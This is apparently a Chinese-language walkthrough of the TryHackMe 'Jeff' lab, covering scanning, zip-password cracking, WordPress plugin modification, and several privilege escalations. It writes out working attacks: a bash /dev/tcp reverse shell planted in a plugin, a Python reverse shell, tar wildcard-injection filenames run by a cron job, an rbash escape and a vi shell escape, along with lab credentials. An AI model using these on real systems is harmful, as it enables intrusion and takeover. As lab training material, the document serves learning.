TryHackMe-Jeff

在线链接:Jeff

0x01 信息收集

1
echo 'ip jeff.thm' > /etc/hosts

NMAP

1
2
3
4
5
6
7
8
9
10
11
12
nmap -p- -sC -sV 10.10.214.2

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 7e:43:5f:1e:58:a8:fc:c9:f7:fd:4b:40:0b:83:79:32 (RSA)
| 256 5c:79:92:dd:e9:d1:46:50:70:f0:34:62:26:f0:69:39 (ECDSA)
|_ 256 ce:d9:82:2b:69:5f:82:d0:f5:5c:9b:3e:be:76:88:c3 (ED25519)
80/tcp open http nginx
|_http-title: Jeffs Portfolio
MAC Address: 02:76:70:D3:7C:07 (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

只开了两个端口,web和ssh。

SSH

1
2
3
4
5
6
7
8
9
10
11
12
[email protected]:~# nc -nv 10.10.214.2 22
(UNKNOWN) [10.10.214.2] 22 (ssh) open
SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.3
^C
Protocol mismatch.
[email protected]:~# ssh 10.10.214.2
The authenticity of host '10.10.214.2 (10.10.214.2)' can't be established.
ECDSA key fingerprint is SHA256:81na22Hs/2kaLeyNJit8TG9Ba4kVYm9LhIObseJmCZM.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.214.2' (ECDSA) to the list of known hosts.
[email protected]'s password:
^C

我就简单看下有没有什么隐藏信息。。

HTTP

gobuster

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
[email protected]:~# gobuster dir -u http://jeff.thm -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://jeff.thm
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/10/16 14:07:24 Starting gobuster
===============================================================
/uploads (Status: 301)
/admin (Status: 301)
/assets (Status: 301)
/backups (Status: 301)
/source_codes (Status: 301)
===============================================================
2020/10/16 14:07:44 Finished
===============================================================

首页

image-20201017120018965

uploads页面

image-20201017120055952

1
2
3
4
5
6
7
8
9
10
11
12
13
14
<!DOCTYPE html>
<html>
<head>
<title>Jeff's file uploader</title>
</head>
<body>

<form action="#">
<input type="file" name="upload_file" />
<input type="submit" value="Upload">
</form>

</body>
</html>

空动作。

admin,sound_codes都是访问空白页面。backups则有个Jeff.thm的字样,assets。403

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
gobuster dir -u http://jeff.thm/backups/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x zip,gzip,rar
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://jeff.thm/backups/
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: zip,gzip,rar
[+] Timeout: 10s
===============================================================
2020/10/17 05:04:53 Starting gobuster
===============================================================
/backup.zip (Status: 200)

解压需要密码。

1
2
3
4
zip2john backup.zip > zip.hash
john --wordlist=/usr/share/wordlists/rockyou.txt zip.hash
john --show zip.hash
backup.zip:!!Burningbird!!::backup.zip:backup/wpadmin.bak, backup/assets/EnlighterJS.min.js, backup/assets/MooTools-Core-1.6.0-compressed.js:backup.zip

查看wpadmin.bak

1
wordpress password is: phO#g)C5dhIWZn3BKP

有wordpress?但是没扫出来啊。。试下子域名爆破

1
2
3
4
5
6
7
8
9
10
11
12
13
wfuzz -c -f subdomains.txt -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://jeff.thm/" -H "Host: FUZZ.jeff.thm" --hl 1

Target: http://jeff.thm/
Total requests: 4997
==================================================================
ID Response Lines Word Chars Request
==================================================================
00326: C=200 346 L 1455 W 25901 Ch "wordpress"

Total time: 0
Processed Requests: 4997
Filtered Requests: 4996
Requests/sec.: 0

接着把ip wordpress.jeff.thm追加到/etc/hosts里面

image-20201017121851589

用户应该是jeff。

登陆成功

image-20201017121922332

直接修改插件akismet/akismet.php,添加

1
system('bash -c "bash -i >&/dev/tcp/ip/1234 0>&1"');

image-20201017122021709

image-20201017122135114

改好之后直接激活即可。(直接访问目录不行,应为目标环境设置了相应目录的403权限.

0x02 提权

容器

image-20201017122237735

经过一段时间信息收集后,我发现这是个docker容器。。。不过在wordpress目录下还是能找到一个有趣的文件。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
<?php
/*
Todo: I need to finish coding this database backup script.
also maybe convert it to a wordpress plugin in the future.
*/
$dbFile = 'db_backup/backup.sql';
$ftpFile = 'backup.sql';

$username = "backupmgr";
$password = "SuperS1ckP4ssw0rd123!";

$ftp = ftp_connect("172.20.0.1"); // todo, set up /etc/hosts for the container host

if( ! ftp_login($ftp, $username, $password) ){
die("FTP Login failed.");
}

$msg = "Upload failed";
if (ftp_put($ftp, $remote_file, $file, FTP_ASCII)) {
$msg = "$file was uploaded.\n";
}

echo $msg;
ftp_close($conn_id);

这里已经有一个ftp用户的凭证了,我尝试用ssh登陆这个用户,但是不成功。不过猜测上传之后,应该是会有一个打包程序在ftp服务器执行的。

新建一个以下内容的shell.sh,新建一个空文本的a.txt和b.txt

1
python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ip',port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i'])"

修改之后ftp_backup.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
<?php

$username = "backupmgr";
$password = "SuperS1ckP4ssw0rd123!";
$ftpfile_sh = "shell.sh";
$ftpfile_1="--checkpoint=1";
$ftpfile_2="--checkpoint-action=exec=sh shell.sh";

$ftp = ftp_connect("172.20.0.1");



if( ! ftp_login($ftp, $username, $password) ){
echo 'die!!!';
die("FTP Login failed.");
}

ftp_pasv($ftp, false);

echo PHP_EOL;
print_r (ftp_nlist($ftp,"/"));

ftp_chdir($ftp,"files");
print_r (ftp_nlist($ftp,"."));
print_r (ftp_pwd($ftp));

echo ftp_put($ftp,$ftpfile_sh,"./shell.sh",FTP_ASCII);

echo ftp_put($ftp,$ftpfile_1,"./a.txt",FTP_ASCII);

echo ftp_put($ftp,$ftpfile_2,"./b.txt",FTP_ASCII);

echo PHP_EOL;
print_r (ftp_nlist($ftp,"."));


ftp_close($ftp);

搞半天终于上传成功。。看php的ftp方法时有个ftp_exec()但是我死活用不上了。。谷歌之后也不明所以。。知道的大手子可以告诉我下。

image-20201017150224084

image-20201017153333196

backupmgr

image-20201017153413369

这里是利用tar的通配符提权,连进去之后看看crontab -l,就会发现有个定时打包的脚本了。

1
2
3
find / -user jeff -type f 2>/dev/null
/opt/systools/systool
/var/backups/jeff.bak

jeff.bak没有权限。

systool是个程序。输入1则会执行ps aux,2的话就会打印message.txt的内容,3的话就退出。

image-20201017163005686

systool相同目录下有个文本

1
2
3
[email protected]:/opt/systools$ cat message.txt

Jeff, you should login with your own account to view/change your password. I hope you haven't forgotten it.

这两个文件属于同一个组 pwman,messaget.txt的话,可以直接删掉,创建一个同名的符号链接指向jeff.bak

1
ln -s /var/backups/jeff.bak message.txt

再次执行systool

image-20201017163310102

1
Your Password is: 123-My-N4M3-1z-J3ff-123

我这里直接用python3 -c 'import pty;pty.spawn("/bin/bash")'但是不成功。如果是Linux环境的话可以尝试用这个方法打开tty,然后切换jeff用户。

1
2
3
4
5
6
SHELL=/bin/bash script -q /dev/null
Ctrl-Z
stty raw -echo
fg
reset
xterm

jeff

ssh 登陆进jeff后,会发现这是一个该死的rbash..

1
2
3
4
[email protected]:~$ vim
-rbash: /usr/lib/command-not-found: restricted: cannot specify `/' in command names
[email protected]:~$ echo $SHELL
/bin/rbash

搜索了一下逃逸方式后,我选用了这个。

1
ssh [email protected] -t "bash --noprofile"
1
2
3
4
5
6
7
8
[email protected]:~$ sudo -l
[sudo] password for jeff:
Matching Defaults entries for jeff on tryharder:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User jeff may run the following commands on tryharder:
(ALL) /usr/bin/crontab

image-20201017162810654

进到crontab的编辑器会发现这是vi编辑器,所以可以直接这样提权

1
:!/bin/bash

flag

jeff user的flag

1
echo -n user.txt|md5

root的就在root目录下